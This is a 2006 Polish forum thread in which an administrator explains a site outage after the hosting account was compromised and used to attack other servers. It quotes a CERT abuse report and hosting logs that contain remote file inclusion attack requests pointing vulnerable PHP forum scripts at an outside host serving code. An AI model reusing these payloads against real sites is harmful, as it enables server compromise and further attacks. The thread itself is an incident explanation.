IVRP.pl Strona Główna IVRP.pl
polityka - militaria - kultura - podróże

FAQFAQ  SzukajSzukaj  UżytkownicyUżytkownicy  GrupyGrupy
RejestracjaRejestracja  ZalogujZaloguj  AlbumAlbum  DownloadDownload

Poprzedni temat «» Następny temat
Co się stało z forum - WYJAŚNIENIE
Autor Wiadomość
Szybszy 
członek władz wojewódzkich


Pomógł: 1 raz
Dołączył: 13 Sty 2003
Posty: 2805
Skąd: wierzby, pola, ruczaj płynie
Wysłany: Pią 10 Lis, 2006 20:18   Co się stało z forum - WYJAŚNIENIE

Witam,

W imieniu Rady Forum przepraszam za brak forum przez kilka dni. Jesteśmy już znowu a akcji i to na nowym, bezpieczniejszym serwerze. Niestety, wcięło gdzieś Hyde Park, mam nadzieję że go odzyskamy. Mogą być jeszcze inne dysfunkcje - proszę raportować je poniżej.

Co się stało?

1) Ktoś włamał się na serwer naszego, pożal się Boże, providera internetowego, i wykorzystał program forum do ataku jakichś serwerów w Wielkiej Brytanii. W komunikacie od Anglików pojawiała się kilkakrotnie strona molganinovo.r u jako prawdopodobny inicjator ataków. Dlatego zamknęli nam konto.

2) Provider nakazał zaktualizować skrypt do najnowszej wersji, dzięki czemu miał być bardziej odporny na takie ataki w przyszłości, był to warunek odwieszenia konta. Aktualizację skryptu załatwił MS, odpaliliśmy ją.... i forum się rozpieprzyło.

3) Dokładnie w tym czasie MS musiał z poważnych powodów prywatnych wyłączyć się, co pozbawiło nas wsparcia informatycznego.

Co dalej, jak zabezpieczymy się przed podobną sytuacją w przyszłości ?
a) Jak wspomniałem, zmieniliśmy dostawcę internetu na lidera polskego rynku home.pl Nikt nie jest doskonały ale japrzez 4 lata nie miałem z nimi najmniejszego problemu.
b) Przeniesiemy forum za jakiś czas z obecnego niemieckiego silnika forum na coś innego, ale z tym pośpiechu nie ma.
c) Poszukamy zaginionego Hyde Parku.

Cytat:
Otrzymalismy nastepujacy raport:

============================================================================

Subject: [DK*CERT#264171] - Scanning from 195.62.28.65
Date: Sun, 5 Nov 2006 14:20:20 +0100
From: cert@cert.dk
To: abuse@ukwebhosting.ltd.uk

Dear Administrator,

We recieved a complaint about networkscan from IP 195.62.28.65.
Please see the attached set of logs from the security software.

It might be that your host has been taken over by intruders.
Please disconnect IMMEDIATELY this host
and investigate its security status.

Otherwise please identify your customer operating from the above
address at the time mentioned, and terminate immediately his hacking
activities. Please prevent him from continuing these kind of activities
in the future as well.


This incident has been assigned the following number:

DK*CERT#264171

For future reference, please include this number in the subject line of your
e-mail.


Best regards,
DK*CERT Abuse Team,

DK*CERT
UNI*C,
DTU, Matematiktorvet, bygning 304
2800 Kgs. Lyngby

Email: cert@cert.dk
Telefon: +45 3587 8887
Web: www.cert.dk



If nothing else mentioned below, timezone is believed to be UTC+0100(CET)
Destination address(es): Adresser i nettene 130.225.16.0/22 og
130.225.2.128/25

Security logs:



[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
11/04-17:36:15.778136 195.62.28.65:55406 -> 130.225.16.54:80
TCP TTL:58 TOS:0x20 ID:49838 IpLen:20 DgmLen:237 DF
***AP*** Seq: 0x2881FA Ack: 0xB58CFBCB Win: 0x16D0 TcpLen: 20
GET /PB/555/templates/pb/language/lang_nl.php?temppath=http://mo
lganinovo.ru/c.txt? HTTP/1.1..TE: deflate,gzip;q=0.3..Connection
: TE, close..Host: www.daimi.au.dk..User-Agent: libwww-perl/5.80
5....

[Szybszy: tu kilka innych podobnych paragrafów inofrmujących o ataku z naszego skryptu ale pochodzącego ze strony molganinovo.ru]

[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
11/04-17:50:12.545123 195.62.28.65:39395 -> 130.225.16.54:80
TCP TTL:58 TOS:0x20 ID:26244 IpLen:20 DgmLen:237 DF
***AP*** Seq: 0x357AECBC Ack: 0x90B96D7F Win: 0x16D0 TcpLen: 20
GET /PB/159/templates/pb/language/lang_nl.php?temppath=http://mo
lganinovo.ru/c.txt? HTTP/1.1..TE: deflate,gzip;q=0.3..Connection
: TE, close..Host: www.daimi.au.dk..User-Agent: libwww-perl/5.80
5....

============================================================================

Po sprawdzeniu logow Panstwa konta ustalilismy nastepujacy skrypt
wykorzystany do ataku:

fnp.aplus.pl:202.143.135.34 - - [05/Nov/2006:19:33:32 +0100] "GET
//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://molganinovo.ru/c.php.txt?
HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
fnp.aplus.pl:202.143.135.34 - - [05/Nov/2006:19:37:08 +0100] "GET
//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://molganinovo.ru/c.php.txt?
HTTP/1.1" 404 5 "-" "libwww-perl/5.79"

W zwiazku z powyzszym informujemy, ze konto fnp zostalo zawieszone. Zdjecie
blokady z konta jest mozliwe tylko w momencie przeprowadzenia aktualizacji
skryptu uzywanego przez Panstwa na stronie do najnowszej dostepnej wersji, w
ktorej w/w luka w zabezpieczeniach nie wystepuje.

Posiadaja Panstwo dostep do FTP konta, prosze wgrac pliki aktualizacyjne,
kiedy beda Panstwo gotowi do przeprowadzenia aktualizacji, prosze przeslac
do nas stosowna wiadomosc, odblokujemy dostep do konta aby mogli Panstwo
dokonczyc aktualizacje.

BOK netlook.pl

--
:.: PROSCAPE Netlook.pl Webhosting & Webdesign
:.: Tel.: 091 489-59-66, 0697 40-40-44, Fax: 091 489-59-66 wew. 24
:.: Centrum Pomocy Technicznej 24h: https://support.netlook.pl
:.: Biuro Obslugi Klienta: Szczecin, ul. Niedziałkowskiego 24
_________________
Aleksander Kwaśniewski 6.02.2013: "Istnienie alternatywy centrolewicowej jest w interesie obecnie rządzących, bo może ich uwolnić od zemsty pisowców"
 
 
agitator 
zwykły członek, płacący składki

Dołączył: 28 Paź 2005
Posty: 240
Wysłany: Pią 10 Lis, 2006 20:58   

sprawdzam tylko czy moje konto dziala ; ]]]
_________________
"Ja bardzo dużo czytam, odświeżam umysł i kur... będę jak brzytwa."
 
 
Hegemon 
Beczkowóz


Pomógł: 2 razy
Wiek: 43
Dołączył: 11 Lut 2006
Posty: 11979
Skąd: z głupia frant
Wysłany: Sob 11 Lis, 2006 23:51   

I jeszcze informacja dla Użytkowników, którzy zarejestrowali się pomiędzy 24 października a 10 listopada br. i nie mogą się teraz zalogować: ponieważ Forum zostało odtworzone wedle stanu na 24 października, konieczna jest z Waszej strony ponowna rejestracja. Przepraszamy za utrudnienie.
_________________
Его Высокопревосходительство
 
 
ptak 
przewodniczący zarządu o. p.


Wiek: 68
Dołączył: 31 Gru 2005
Posty: 2013
Skąd: Śląsk
Wysłany: Wto 14 Lis, 2006 08:32   

Hegemon napisał/a:
...ponieważ Forum zostało odtworzone wedle stanu na 24 października...


...wniosę o pociągnięcie za konsekwencje oraz rekompensatę za utraconą własność intelektualną.
 
 
Hegemon 
Beczkowóz


Pomógł: 2 razy
Wiek: 43
Dołączył: 11 Lut 2006
Posty: 11979
Skąd: z głupia frant
Wysłany: Wto 14 Lis, 2006 13:04   

Pisz acan na molganinovo.ru :P
_________________
Его Высокопревосходительство
 
 
ptak 
przewodniczący zarządu o. p.


Wiek: 68
Dołączył: 31 Gru 2005
Posty: 2013
Skąd: Śląsk
Wysłany: Wto 14 Lis, 2006 14:08   

Oto, jak traktuje się tu tfurcuf.
 
 
Wyświetl posty z ostatnich:   
Odpowiedz do tematu
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Możesz załączać pliki na tym forum
Możesz ściągać załączniki na tym forum
Dodaj temat do Ulubionych
Wersja do druku

Skocz do:  

Powered by phpBB modified by Przemo © 2003 phpBB Group
Strona wygenerowana w 0,06 sekundy. Zapytań do SQL: 10